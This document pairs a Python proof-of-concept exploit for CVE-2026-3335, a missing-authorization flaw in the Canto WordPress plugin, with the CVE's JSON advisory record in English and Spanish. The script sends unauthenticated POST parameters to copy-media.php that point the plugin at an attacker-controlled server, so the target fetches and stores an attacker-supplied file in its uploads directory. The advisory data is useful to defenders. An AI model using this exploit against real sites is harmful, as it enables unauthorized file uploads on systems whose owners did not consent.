CVE-2026-3335

import requests def exploit(target_url, attacker_domain): """ Exploit CVE-2026-3335 by sending a malicious POST request to copy-media.php. """ # The vulnerable endpoint endpoint = f"{target_url}/wp-content/plugins/canto/includes/lib/copy-media.php" # Malicious POST parameters to control the fetch-and-upload chain payload = { "fbc_flight_domain": attacker_domain, "fbc_app_api": f"{attacker_domain}/api", "fbc_app_token": "arbitrary_attacker_controlled_token" } try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check the target's uploads directory for the file.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": target = "http://example-wordpress-site.com" evil_server = "http://attacker-controlled-server.com" exploit(target, evil_server)

{"cve": {"id": "CVE-2026-3335", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:17:20.780", "lastModified": "2026-04-24T16:27:44.277", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Canto plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.1.1 via the `/wp-content/plugins/canto/includes/lib/copy-media.php` file. This is due to the file being directly accessible without any authentication, authorization, or nonce checks, and the `fbc_flight_domain` and `fbc_app_api` URL components being accepted as user-supplied POST parameters rather than read from admin-configured options. Since the attacker controls both the destination server and the `fbc_app_token` value, the entire fetch-and-upload chain is attacker-controlled — the server never contacts Canto's legitimate API, and the uploaded file originates entirely from the attacker's infrastructure. This makes it possible for unauthenticated attackers to upload arbitrary files (constrained to WordPress-allowed MIME types) to the WordPress uploads directory. Additional endpoints (`detail.php`, `download.php`, `get.php`, `tree.php`) are also directly accessible without authentication and make requests using a user-supplied `app_api` parameter combined with an admin-configured subdomain."}, {"lang": "es", "value": "El plugin Canto para WordPress presenta una vulnerabilidad de falta de autorización en todas las versiones hasta la 3.1.1, incluida esta, a través del archivo `/wp-content/plugins/canto/includes/lib/copy-media.php`. Esto se debe a que se puede acceder directamente al archivo sin comprobaciones de autenticación, autorización o nonce, y a que los componentes de URL `fbc_flight_domain` y `fbc_app_api` se aceptan como parámetros POST proporcionados por el usuario en lugar de leerse desde las opciones configuradas por el administrador. Dado que el atacante controla tanto el servidor de destino como el valor `fbc_app_token`, toda la cadena de obtención y carga queda bajo su control: el servidor nunca se pone en contacto con la API legítima de Canto, y el archivo cargado procede íntegramente de la infraestructura del atacante. Esto permite a atacantes no autenticados cargar archivos arbitrarios (limitados a los tipos MIME permitidos por WordPress) en el directorio de cargas de WordPress. También se puede acceder directamente a otros puntos finales (`detail.php`, `download.php`, `get.php`, `tree.php`) sin necesidad de autenticación, y estos realizan solicitudes utilizando un parámetro `app_api` proporcionado por el usuario combinado con un subdominio configurado por el administrador."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L152", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L306", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L71", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/canto/trunk/includes/lib/copy-media.php#L152", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/canto/trunk/includes/lib/copy-media.php#L306", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/canto/trunk/includes/lib/copy-media.php#L71", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0777f759-6980-4572-a866-0210bd5f5085?source=cve", "source": "[email protected]"}]}}